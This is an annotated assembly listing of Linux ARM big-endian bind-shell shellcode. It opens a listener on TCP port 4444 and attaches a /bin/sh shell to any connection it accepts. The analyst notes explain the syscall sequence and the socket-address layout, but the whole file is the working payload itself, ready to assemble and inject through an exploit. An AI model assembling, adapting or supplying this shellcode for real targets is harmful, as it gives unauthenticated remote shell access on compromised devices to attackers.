/*
 * Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
 * Balazs Bucsay @xoreipeip | earthquake rycon hu
 * http://rycon.hu
 *
 * port = 4444
 * ip   = 0.0.0.0
 *
 * Review notes (for analysts reading this listing):
 *   ABI:    Linux ARM EABI syscalls -- r7 = syscall number, arguments in
 *           r0-r3, entered with "svc 1".  Host-observable sequence:
 *           socket -> bind -> listen -> accept -> dup2 x3 -> execve -> exit.
 *           No syscall return value is ever checked.
 *   Network: a listener on 0.0.0.0:4444 (AF_INET); the port is hard-coded
 *           below as the big-endian word 0x0002115C.
 *   Layout: the pc-relative "add r0, #18" that locates the "//bin/sh" string
 *           depends on the exact size and order of every instruction after
 *           it; the code is position-dependent and must not be reordered.
 */
        .section .text
        .global _start

_start:
        .code   32                      @ entered in ARM state; the next two
                                        @ instructions switch to Thumb state
        add     r6, pc, #1              @ r6 = address of the .code 16 block, bit 0 set
        bx      r6                      @ bit 0 = 1 -> continue in Thumb

        .code   16

# _socket(2,1,0)  ->  socket(AF_INET, SOCK_STREAM, 0)
        sub     r2, r2, r2              @ r2 = 0 (protocol)
        add     r1, r2, #1              @ r1 = 1 (SOCK_STREAM)
        add     r0, r2, #2              @ r0 = 2 (AF_INET)
        lsl     r7, r1, #8              @ r7 = 0x100
        add     r7, r7, #0x19           @ r7 = 0x119 = 281 (sys_socket, ARM EABI)
        svc     1
        mov     r6, r0                  @ r6 = listening socket fd, kept across calls

/*
 * struct sockaddr_in as written to the stack by the _bind block below.
 * The target is big-endian, so the word 0x0002115C lands as bytes 00 02 11 5C:
 *   2  sa_family_t    sin_family    00 02              AF_INET
 *   2  in_port_t      sin_port      11 5C              0x115C = 4444, network byte order
 *   4  struct in_addr sin_addr      00 00 00 00        INADDR_ANY (0.0.0.0)
 *   8  char           sin_zero[8]   00000000 00000000
 */
# _bind(fd, &sockaddr_in, 16)
        mov     r2, #2
        lsl     r2, r2, #8              @ r2 = 0x0200
        add     r2, r2, #0x11           @ r2 = 0x0211
        lsl     r2, r2, #8              @ r2 = 0x021100
        add     r2, r2, #0x5C           @ r2 = 0x0002115C  (sin_family = 2, sin_port = 0x115C)
        sub     r3, r3, r3              @ r3 = 0 -> sin_addr = 0.0.0.0
        sub     r4, r4, r4              @ r4 = 0 -> sin_zero[0..3]
        sub     r5, r5, r5              @ r5 = 0 -> sin_zero[4..7]
        mov     r1, sp
        stm     r1!, {r2-r5}            @ store the 16-byte struct at sp; r1 = sp + 16
        sub     r1, #0x10               @ r1 = sp = &sockaddr_in
        mov     r2, #16                 @ addrlen = sizeof(struct sockaddr_in)
        add     r7, r7, #1              @ r7 = 282 (sys_bind)
        svc     1                       @ r0 still holds the socket fd from _socket

# _listen(fd, 0)
        mov     r0, r6
        sub     r1, r1, r1              @ backlog = 0
        add     r7, r7, #2              @ r7 = 284 (sys_listen)
        svc     1

# _accept(fd, NULL, NULL)
        mov     r0, r6
        sub     r2, r2, r2              @ addrlen = NULL; r1 is still 0 from _listen (addr = NULL)
        add     r7, r7, #1              @ r7 = 285 (sys_accept)
        svc     1
        mov     r6, r0                  @ r6 = fd of the accepted connection

# _dup2(client, 0), _dup2(client, 1), _dup2(client, 2)
# stdin/stdout/stderr are redirected onto the accepted connection
        sub     r1, r1, r1              @ r1 = 0 (stdin); r0 = client fd from _accept
        mov     r7, #63                 @ r7 = 63 (sys_dup2)
        svc     1
        mov     r0, r6
        add     r1, r1, #1              @ r1 = 1 (stdout)
        svc     1
        mov     r0, r6
        add     r1, r1, #1              @ r1 = 2 (stderr)
        svc     1

# _execve("//bin/sh", argv, NULL)
        sub     r2, r2, r2              @ envp = NULL
        mov     r0, pc                  @ in Thumb, pc reads as this instruction + 4
        add     r0, #18                 @ r0 = &"//bin/sh": the 10 two-byte Thumb
                                        @ instructions below end exactly at pc + 18;
                                        @ any change to them breaks this offset
        // next instruction terminates the string beneath the code "//bin/sh"
        // in case you want to say goodbye to the null character
        // str r2, [r0, #8]
        str     r2, [sp, #8]            @ argv[1] = NULL
        str     r0, [sp, #4]            @ argv[0] = &"//bin/sh"
        add     r1, sp, #4              @ r1 = argv
        mov     r7, #11                 @ r7 = 11 (sys_execve)
        svc     1

# _exit(0)  -- only reached if execve fails
        sub     r4, r4, r4
        mov     r0, r4                  @ status = 0
        mov     r7, #1                  @ r7 = 1 (sys_exit)
        svc     1

        .ascii  "//bin/sh\0"            @ path string referenced by the execve block
        //.ascii "//bin/sh"